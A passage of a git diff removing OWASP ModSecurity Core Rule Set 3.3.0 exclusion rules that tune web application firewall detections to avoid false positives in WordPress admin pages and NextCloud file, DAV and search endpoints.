- ctl:ruleRemoveTargetById=942260;ARGS:partials,\ - 
ctl:ruleRemoveTargetById=942330;ARGS:partials,\ - ctl:ruleRemoveTargetById=942340;ARGS:partials,\ - ctl:ruleRemoveTargetById=942370;ARGS:partials,\ - ctl:ruleRemoveTargetById=942430;ARGS:partials,\ - ctl:ruleRemoveTargetById=942431;ARGS:partials,\ - ctl:ruleRemoveTargetById=942460;ARGS:partials" - - - -# Self calls to wp-cron.php?doing_wp_cron=[timestamp] -# These requests may be missing Accept, Content-Length headers. -# This rule must run in phase:1. -SecRule REQUEST_FILENAME "@endsWith /wp-cron.php" \ - "id:9002200,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=920180,\ - ctl:ruleRemoveById=920300,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Cookies ] - -# WP Session Manager -# Cookie: _wp_session=[hex]||[timestamp]||[timestamp] -# detected SQLi using libinjection with fingerprint 'n&1' -SecRule REQUEST_COOKIES:_wp_session "@rx ^[0-9a-f]+\|\|\d+\|\|\d+$" \ - "id:9002300,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &REQUEST_COOKIES:_wp_session "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:_wp_session" - - -# -# -=[ WordPress Administration Back-End (wp-admin) ]=- -# - -# Skip this section for performance unless /wp-admin/ is in filename - -SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ - "id:9002400,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-WORDPRESS-ADMIN" - -SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ - "id:9002401,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-WORDPRESS-ADMIN" - - -# -# [ Installation ] -# - -# WordPress installation: exclude database password -SecRule REQUEST_FILENAME "@endsWith /wp-admin/setup-config.php" \ - "id:9002410,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:step "@streq 2" \ - "t:none,\ - chain" - SecRule &ARGS:step "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd" - -# WordPress installation: 
exclude admin password -SecRule REQUEST_FILENAME "@endsWith /wp-admin/install.php" \ - "id:9002420,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:step "@streq 2" \ - "t:none,\ - chain" - SecRule &ARGS:step "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password2,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text" - - -# -# [ User management ] -# - -# Edit logged-in user -SecRule REQUEST_FILENAME "@endsWith /wp-admin/profile.php" \ - "id:9002520,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq update" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ctl:ruleRemoveTargetById=931130;ARGS:facebook,\ - ctl:ruleRemoveTargetById=931130;ARGS:instagram,\ - ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\ - ctl:ruleRemoveTargetById=931130;ARGS:myspace,\ - ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\ - ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\ - ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\ - ctl:ruleRemoveTargetById=931130;ARGS:youtube,\ - ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" - -# Edit user -SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-edit.php" \ - "id:9002530,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq update" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ctl:ruleRemoveTargetById=931130;ARGS:facebook,\ - ctl:ruleRemoveTargetById=931130;ARGS:instagram,\ - ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\ - ctl:ruleRemoveTargetById=931130;ARGS:myspace,\ - 
ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\ - ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\ - ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\ - ctl:ruleRemoveTargetById=931130;ARGS:youtube,\ - ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" - -# Create user -SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-new.php" \ - "id:9002540,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq createuser" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" - - -# -# [ General exclusions ] -# - -# _wp_http_referer and wp_http_referer are passed on a lot of wp-admin pages -SecAction \ - "id:9002600,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=920230;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=931130;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=932150;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=941100;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=942130;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=942200;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=942260;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=942431;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=942440;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=920230;ARGS:wp_http_referer,\ - ctl:ruleRemoveTargetById=931130;ARGS:wp_http_referer,\ - ctl:ruleRemoveTargetById=932150;ARGS:wp_http_referer,\ - ctl:ruleRemoveTargetById=941100;ARGS:wp_http_referer,\ - ctl:ruleRemoveTargetById=942130;ARGS:wp_http_referer,\ - ctl:ruleRemoveTargetById=942200;ARGS:wp_http_referer,\ - ctl:ruleRemoveTargetById=942260;ARGS:wp_http_referer,\ 
- ctl:ruleRemoveTargetById=942431;ARGS:wp_http_referer,\ - ver:'OWASP_CRS/3.3.0'" - -# -# [ Content editing ] -# - -# Edit posts and pages -# /wp-admin/post.php, /wp-admin/post.php?t=[timestamp] -# - Themes do not properly escape post_title in HTML, so beware of XSS -# and be conservative in excluding this parameter. -# - Parameter _wp_http_referer can appear multiple times. -SecRule REQUEST_FILENAME "@endsWith /wp-admin/post.php" \ - "id:9002700,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@rx ^(?:edit|editpost)$" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:post_title,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ - ctl:ruleRemoveById=920272,\ - ctl:ruleRemoveById=921180" - -# Autosave posts and pages -# ARGS_NAMES:data[wp-check-locked-posts][] can appear multiple times -SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ - "id:9002710,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq heartbeat" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:data[wp_autosave][post_title],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:data[wp_autosave][content],\ - ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][post_id],\ - ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][lock],\ - ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-check-locked-posts][],\ - ctl:ruleRemoveById=921180,\ - ctl:ruleRemoveById=920272" - -# Edit menus -SecRule REQUEST_FILENAME "@endsWith /wp-admin/nav-menus.php" \ - "id:9002720,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq update" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=942460;ARGS:menu-name,\ - 
ctl:ruleRemoveTargetById=941330;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=941340;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942200;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942260;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942330;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942340;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942430;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942431;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942460;ARGS:nav-menu-data" - -# Edit text widgets (can contain custom HTML) -SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ - "id:9002730,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@rx ^(?:save-widget|update-widget)$" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[0][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[1][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[2][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[3][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[4][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[5][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[6][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[7][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[8][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[9][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[10][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[11][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[12][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[13][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[14][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[15][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[16][text],\ - 
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[17][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[18][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[19][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[20][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[21][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[22][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[23][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[24][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[25][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[26][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[27][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[28][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[29][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[30][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[31][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[32][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[33][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[34][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[35][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[36][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[37][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[38][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[39][text]" - -# Reorder widgets -SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ - "id:9002740,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq widgets-order" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-1],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-1],\ - 
ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-2],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-2],\ - ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-3],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-3],\ - ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-4],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-4],\ - ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-5],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-5],\ - ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-6],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-6],\ - ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-7],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-7]" - -# Create permalink sample for new post -SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ - "id:9002750,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq sample-permalink" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:new_title" - -# Add external link to menu -SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ - "id:9002760,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq add-menu-item" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=931130;ARGS:menu-item[-1][menu-item-url]" - -# Editor: Add Media, Insert Media, Insert into page -SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ - "id:9002770,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq send-attachment-to-editor" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html" - - -# -# [ Options and Settings ] -# - -# Change site URL -SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ - "id:9002800,\ - 
phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:option_page "@streq general" \ - "t:none,\ - chain" - SecRule &ARGS:option_page "@eq 1" \ - "t:none,\ - chain" - SecRule ARGS:action "@streq update" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=931130;ARGS:home,\ - ctl:ruleRemoveTargetById=931130;ARGS:siteurl" - -# Permalink settings -# permalink_structure=/index.php/%year%/%monthnum%/%day%/%postname%/ -SecRule REQUEST_FILENAME "@endsWith /wp-admin/options-permalink.php" \ - "id:9002810,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=920230;ARGS:selection,\ - ctl:ruleRemoveTargetById=920272;ARGS:selection,\ - ctl:ruleRemoveTargetById=942431;ARGS:selection,\ - ctl:ruleRemoveTargetById=920230;ARGS:permalink_structure,\ - ctl:ruleRemoveTargetById=920272;ARGS:permalink_structure,\ - ctl:ruleRemoveTargetById=942431;ARGS:permalink_structure,\ - ctl:ruleRemoveTargetById=920272;REQUEST_BODY,\ - ver:'OWASP_CRS/3.3.0'" - -# Comments blacklist and moderation list -SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ - "id:9002820,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:option_page "@streq discussion" \ - "t:none,\ - chain" - SecRule &ARGS:option_page "@eq 1" \ - "t:none,\ - chain" - SecRule ARGS:action "@streq update" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:blacklist_keys,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:moderation_keys" - -# Posts/pages overview search -SecRule REQUEST_FILENAME "@endsWith /wp-admin/edit.php" \ - "id:9002830,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:s,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Helpers ] -# - -# /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common, -# admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags, -# 
jquery-query,admin-comments,svg-painter,heartbeat,&load%5B%5D= -# wp-auth-check,wp-a11y,wplink,jquery-ui-core,jquery-ui-widget, -# jquery-ui-position,jquery-ui-menu,jquery-ui-autocomplete&ver=4.6.1 -# -# /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons, -# admin-bar,buttons,media-views,common,forms,admin-menu,dashboard, -# list-tables,edit,revisions,media,themes,about,nav-menu&load%5B%5D= -# s,widgets,site-icon,l10n,wp-auth-check&ver=4.6.1 -# -# /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common, -# admin-bar,jquery-ui-widget,jquery-ui-position,wp-pointer, -# wp-ajax-response,jquery-color,wp-lists,quicktags, -# jqu&load%5B%5D=ery-query,admin-comments,jquery-ui-core, -# jquery-ui-mouse,jquery-ui-sortable,postbox,dashboard,underscore, -# customize-base,customize&load%5B%5D=-loader,thickbox,plugin-install, -# wp-util,wp-a11y,updates,shortcode,media-upload,svg-painter, -# jquery-ui-accordion&ver=3f9999390861a0133beda3ee8acf152e -SecRule REQUEST_FILENAME "@rx /wp-admin/load-(?:scripts|styles)\.php$" \ - "id:9002900,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=921180,\ - ctl:ruleRemoveTargetById=920273;ARGS_NAMES:load[],\ - ctl:ruleRemoveTargetById=942432;ARGS_NAMES:load[],\ - ctl:ruleRemoveTargetById=942360;ARGS:load[],\ - ctl:ruleRemoveTargetById=942430;ARGS:load[],\ - ctl:ruleRemoveTargetById=942431;ARGS:load[],\ - ctl:ruleRemoveTargetById=942432;ARGS:load[],\ - ver:'OWASP_CRS/3.3.0'" - - -SecMarker "END-WORDPRESS-ADMIN" - - -SecMarker "END-WORDPRESS" diff --git a/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf b/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf deleted file mode 100644 index b0ee6fb8fb..0000000000 --- a/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf +++ /dev/null 
@@ -1,415 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# -# ------------------------------------------------------------------------ - -# These exclusions remedy false positives in a default NextCloud install. -# They will likely work with OwnCloud too, but you may have to modify them. -# The exclusions are only active if crs_exclusions_nextcloud=1 is set. -# See rule 900130 in crs-setup.conf.example for instructions. -# -# To relax upload restrictions for only the php files that need it, -# you put something like this in crs-setup.conf: -# -# SecRule REQUEST_FILENAME "@rx /(?:remote.php|index.php)/" \ -# "id:9003330,\ -# phase:1,\ -# t:none,\ -# nolog,\ -# pass,\ -# tx.restricted_extensions='.bak/ .config/ .conf/'" -# -# Large uploads can be modified with SecRequestBodyLimit. Or they -# can be more controlled by using the following: -# -# SecRule REQUEST_URI "@endsWith /index.php/apps/files/ajax/upload.php" \ -# "id:9003610,\ -# phase:1,\ -# t:none,\ -# nolog,\ -# ctl:requestBodyLimit=1073741824" -# -# --------------------- - - -SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ - "id:9003000,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-NEXTCLOUD" - -SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ - "id:9003001,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-NEXTCLOUD" - - -# -# [ File Manager ] -# -# -# The web interface uploads files, and interacts with the user. 
- -SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \ - "id:9003100,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveByTag=attack-injection-php,\ - ctl:ruleRemoveById=941000-942999,\ - ctl:ruleRemoveById=951000-951999,\ - ctl:ruleRemoveById=953100-953130,\ - ctl:ruleRemoveById=920420,\ - ctl:ruleRemoveById=920440,\ - ver:'OWASP_CRS/3.3.0'" - -# Skip PUT parsing for invalid encoding / protocol violations in binary files. - -SecRule REQUEST_METHOD "@streq PUT" \ - "id:9003105,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \ - "t:none,\ - ctl:ruleRemoveById=920000-920999,\ - ctl:ruleRemoveById=932000-932999,\ - ctl:ruleRemoveById=921150,\ - ctl:ruleRemoveById=930110,\ - ctl:ruleRemoveById=930120" - -# Allow the data type 'text/vcard' - -SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ - "id:9003110,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'" - -# Allow the data type 'application/octet-stream' - -SecRule REQUEST_METHOD "@rx ^(?:PUT|MOVE)$" \ - "id:9003115,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_FILENAME "@rx /remote\.php/dav/(?:files|uploads)/" \ - "setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |application/octet-stream|'" - -# Allow data types like video/mp4 - -SecRule REQUEST_METHOD "@streq PUT" \ - "id:9003116,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_FILENAME "@rx (?:/public\.php/webdav/|/remote\.php/dav/uploads/)" \ - "ctl:ruleRemoveById=920340,\ - ctl:ruleRemoveById=920420" - - -# Allow characters like /../ in files. -# Allow all kind of filetypes. -# Allow source code. 
- -SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ - "id:9003120,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=930100-930110,\ - ctl:ruleRemoveById=951000-951999,\ - ctl:ruleRemoveById=953100-953130,\ - ctl:ruleRemoveById=920440,\ - ver:'OWASP_CRS/3.3.0'" - -# Allow REPORT requests without Content-Type header (at least the iOS app does this) - -SecRule REQUEST_METHOD "@streq REPORT" \ - "id:9003121,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - chain" - SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ - "t:none,\ - ctl:ruleRemoveById=920340" - - -# [ Searchengine ] -# -# NexCloud uses a search field for filename or content queries. - -SecRule REQUEST_FILENAME "@contains /index.php/core/search" \ - "id:9003125,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:query,\ - ctl:ruleRemoveTargetById=941000-942999;ARGS:query,\ - ctl:ruleRemoveTargetById=932000-932999;ARGS:query,\ - ver:'OWASP_CRS/3.3.0'" - - -# [ DAV ] -# -# NextCloud uses DAV methods with index.php and remote.php to do many things -# The default ones in ModSecurity are: GET HEAD POST OPTIONS -# -# Looking through the code, and via testing, I found these: -# -# File manager: PUT DELETE MOVE PROPFIND PROPPATCH -# Calendars: REPORT -# Others in the code or js files: PATCH MKCOL MOVE TRACE -# Others that I added just in case, and they seem related: -# CHECKOUT COPY LOCK MERGE MKACTIVITY UNLOCK. 
- -SecRule REQUEST_FILENAME "@rx /(?:remote|index|public)\.php/" \ - "id:9003130,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT PATCH CHECKOUT COPY DELETE LOCK MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH UNLOCK REPORT TRACE jsonp'" - - -# We need to allow DAV methods for sharing files, and removing shares -# DELETE - when the share is removed -# PUT - when setting a password / expiration time - -SecRule REQUEST_FILENAME "@rx /ocs/v[0-9]+\.php/apps/files_sharing/" \ - "id:9003140,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT DELETE'" - - -# [ Preview and Thumbnails ] - -SecRule REQUEST_FILENAME "@contains /index.php/core/preview.png" \ - "id:9003150,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=932150;ARGS:file,\ - ver:'OWASP_CRS/3.3.0'" - -# Filepreview for trashbin - -SecRule REQUEST_FILENAME "@contains /index.php/apps/files_trashbin/ajax/preview.php" \ - "id:9003155,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=932150;ARGS:file,\ - ctl:ruleRemoveTargetById=942190;ARGS:file,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@rx /index\.php/(?:apps/gallery/thumbnails|logout$)" \ - "id:9003160,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=941120;ARGS:requesttoken,\ - ver:'OWASP_CRS/3.3.0'" - - -# [ Ownnote ] - -SecRule REQUEST_FILENAME "@contains /index.php/apps/ownnote/" \ - "id:9003300,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=941150,\ - ver:'OWASP_CRS/3.3.0'" - - -# [ Text Editor ] -# -# This file can save anything, and it's name could be lots of things. 
